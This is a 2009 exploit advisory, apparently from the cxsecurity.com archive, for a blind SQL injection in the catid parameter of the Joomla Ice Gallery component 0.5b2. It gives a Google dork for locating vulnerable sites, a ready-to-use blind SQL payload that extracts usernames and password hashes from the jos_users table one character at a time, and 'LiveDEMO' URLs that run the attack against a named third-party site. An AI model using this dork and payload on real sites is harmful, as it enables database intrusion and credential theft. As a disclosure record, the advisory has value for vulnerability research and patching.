Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln

2009.07.12
Credit: boom3rang
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################# Joomla Component com_ice(catid) Blind SQL-injection ############################################################# ################################################### #[~] Author : boom3rang #[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. #[~] Vulnerability : Blind SQL injection #[~] Google Dork : inurl:com_ice "catid" -------------------------------------------------- #[!] <name>Ice Gallery</name> #[!] <creationDate>29/08/06</creationDate> #[!] <author>Markus Donhauser</author> #[!] <authorEmail>ice.gallery@gmx.net</authorEmail> #[!] <version>0.5 beta 2</version> ################################################### Example: http://localHost/path/index.php?option=com_ice&catid=1[SQL code] SQL code: and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 LiveDEMO: http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4 >>(False) http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5 >>(True) http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 ############################## #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania ##############################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top